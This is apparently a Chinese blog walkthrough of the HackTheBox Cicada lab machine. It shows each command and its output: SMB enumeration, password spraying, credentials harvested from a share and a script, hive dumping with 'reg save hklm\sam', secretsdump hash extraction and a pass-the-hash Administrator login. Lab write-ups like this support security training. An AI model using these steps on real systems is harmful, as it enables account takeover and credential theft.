HackTheBox Cicada Walkthrough

第一次玩HTB的靶机,最近还是喜欢挑windows系统的,先来个easy的。
Tips: windows常用信息检索。
最大的感受是速度慢,比本地靶机差远了。

扫描端口,由于是在线,就不加-p-参数了。

└─$ nmap -sV -sC -Pn  -oN port.log $IP   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 09:33 CST
Nmap scan report for 10.10.11.35
Host is up (0.34s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-06 08:34:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

开了445,一般都是从smb入手。

└─$ netexec smb $IP
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)

└─$ netexec winrm $IP
WINRM       10.10.11.35     5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)

└─$ smbclient -NL $IP

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk      
        HR              Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) 
Unable to connect with SMB1 -- no workgroup available

匿名用户可以登录HR目录。

└─$ smbclient //$IP/HR                    
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 20:29:09 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Notice from HR.txt                  A     1266  Thu Aug 29 01:31:48 2024

                4168447 blocks of size 4096. 418595 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)

打开HR留的一封信,里面有新员工的默认密码。

└─$ cat Notice\ from\ HR.txt 

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

下面的任务是找到用户名,这里使用netexec smb的--rid-brute功能。

└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute                                                                                                                         
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)                
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\anonymous: (Guest)                                                                                        
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)                                                       
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)                                                                                  
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)                                                                                          
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)                                                                                         
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)                                                                                 
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)                                                                                  
SMB         10.10.11.35     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)                                                                                 
SMB         10.10.11.35     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)                       
SMB         10.10.11.35     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)                     
SMB         10.10.11.35     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)                        
SMB         10.10.11.35     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)                          
SMB         10.10.11.35     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)                      
SMB         10.10.11.35     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)                                                                   
SMB         10.10.11.35     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)                                                                  
SMB         10.10.11.35     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)                                                                  
SMB         10.10.11.35     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)                                                                               
SMB         10.10.11.35     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)                                                                                    
SMB         10.10.11.35     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)                                                                         
SMB         10.10.11.35     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)                                                                           
SMB         10.10.11.35     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)                                                       
SMB         10.10.11.35     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)                                                        
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)                                                                                    
SMB         10.10.11.35     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)                                                                                    
SMB         10.10.11.35     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)                                                                               
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)                                                                                       
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)    
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)   
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

用一条命令将上面信息写入users.txt,建立用户名字典。

└─$ cat user_enum.txt|awk -F'CICADA\\\\| \\(' '{print $2}' | sed 's/[[:space:]]*$//'
Enterprise Read-only Domain Controllers
Administrator
Guest
krbtgt
Domain Admins
Domain Users
Domain Guests
Domain Computers
Domain Controllers
Cert Publishers
Schema Admins
Enterprise Admins
Group Policy Creator Owners
Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
RAS and IAS Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
CICADA-DC$
DnsAdmins
DnsUpdateProxy
Groups
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
Dev Support
emily.oscars

爆破,看这条密码是属于哪个用户的。

└─$ netexec smb $IP -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Enterprise Read-only Domain Controllers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Domain Admins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Domain Users:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Domain Guests:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Domain Computers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Domain Controllers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Cert Publishers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Schema Admins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Enterprise Admins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Group Policy Creator Owners:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Read-only Domain Controllers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Cloneable Domain Controllers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Protected Users:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Key Admins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Enterprise Key Admins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\RAS and IAS Servers:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Allowed RODC Password Replication Group:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Denied RODC Password Replication Group:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\DnsAdmins:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\DnsUpdateProxy:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Groups:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Dev Support:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

找到用户michael.wrightson,再次查看smb的权限,和刚才的匿名用户没有变化。

└─$ smbmap -H $IP -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      

[+] IP: 10.10.11.35:445 Name: cicada.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     NO ACCESS
        HR                                                      READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share

下面可以使用enum4linux或者rpcclient,带用户名密码进行检索,可以得到另一条用户名和密码。

└─$ enum4linux  -a -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' $IP

这个结果也就是下面指令的运行结果:

└─$ rpcclient -U  "michael.wrightson"  $IP -c "querydispinfo"
 ========================================( Users on 10.10.11.35 )========================================                                                                    

index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain                                 
index: 0xfeb RID: 0x454 acb: 0x00000210 Account: david.orelious Name: (null)    Desc: Just in case I forget my password is aRt$Lp#7t*VQ!3                                    
index: 0x101d RID: 0x641 acb: 0x00000210 Account: emily.oscars  Name: Emily Oscars      Desc: (null)                                                                         
index: 0xedb RID: 0x1f5 acb: 0x00000214 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain                                       
index: 0xfe7 RID: 0x450 acb: 0x00000210 Account: john.smoulder  Name: (null)    Desc: (null)                                                                                 
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account                                                        
index: 0xfe9 RID: 0x452 acb: 0x00000210 Account: michael.wrightson      Name: (null)    Desc: (null)                                                                         
index: 0xfe8 RID: 0x451 acb: 0x00000210 Account: sarah.dantelia Name: (null)    Desc: (null)

得到david的密码,再次查看smb权限,发现DEV目录可读了。

└─$ smbmap -u  'david.orelious' -p 'aRt$Lp#7t*VQ!3' -H $IP

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      

[+] IP: 10.10.11.35:445 Name: cicada.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DEV                                                     READ ONLY
        HR                                                      READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share

进入DEV目录,找到一个powershell脚本。

└─$ smbclient //$IP/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3' 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 20:31:39 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Backup_script.ps1                   A      601  Thu Aug 29 01:28:22 2024

                4168447 blocks of size 4096. 417422 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)

脚本中给了另一个用户的密码。

└─$ cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

以emily用户登录shell,可以得到user flag。

└─$ evil-winrm -i $IP -u  'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

查看权限,可以备份,接下来就是例行导出SAM和SYSTEM了。

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.

└─$ impacket-secretsdump LOCAL -system system -sam sam                                                                                                                       
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies                                                                                                        

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620                                                                                                                
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)                                                                                                                         
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::                                                                                       
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                               
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                      
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.                                                                     
[*] Cleaning up...

以管理员的hash登录,得到root。

└─$ evil-winrm -i $IP -u Administrator  -H '2b87e7c93a3e8a0ea4a581937016f341'                                                                                                

Evil-WinRM shell v3.7                                                                                                                                                        

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                      

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                        

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                                                    State
=============================== ============================================================== =======
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process                             Enabled
SeMachineAccountPrivilege       Add workstations to domain                                     Enabled
SeSecurityPrivilege             Manage auditing and security log                               Enabled
SeLoadDriverPrivilege           Load and unload device drivers                                 Enabled
SeSystemProfilePrivilege        Profile system performance                                     Enabled
SeSystemtimePrivilege           Change the system time                                         Enabled
SeProfileSingleProcessPrivilege Profile single process                                         Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority                                   Enabled
SeCreatePagefilePrivilege       Create a pagefile                                              Enabled
SeBackupPrivilege               Back up files and directories                                  Enabled
SeRestorePrivilege              Restore files and directories                                  Enabled
SeShutdownPrivilege             Shut down the system                                           Enabled
SeDebugPrivilege                Debug programs                                                 Enabled
SeSystemEnvironmentPrivilege    Modify firmware environment values                             Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                                       Enabled
SeRemoteShutdownPrivilege       Force shutdown from a remote system                            Enabled
SeUndockPrivilege               Remove computer from docking station                           Enabled
SeEnableDelegationPrivilege     Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege         Perform volume maintenance tasks                               Enabled
SeImpersonatePrivilege          Impersonate a client after authentication                      Enabled
SeCreateGlobalPrivilege         Create global objects                                          Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set                                 Enabled
SeTimeZonePrivilege             Change the time zone                                           Enabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                                          Enabled

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注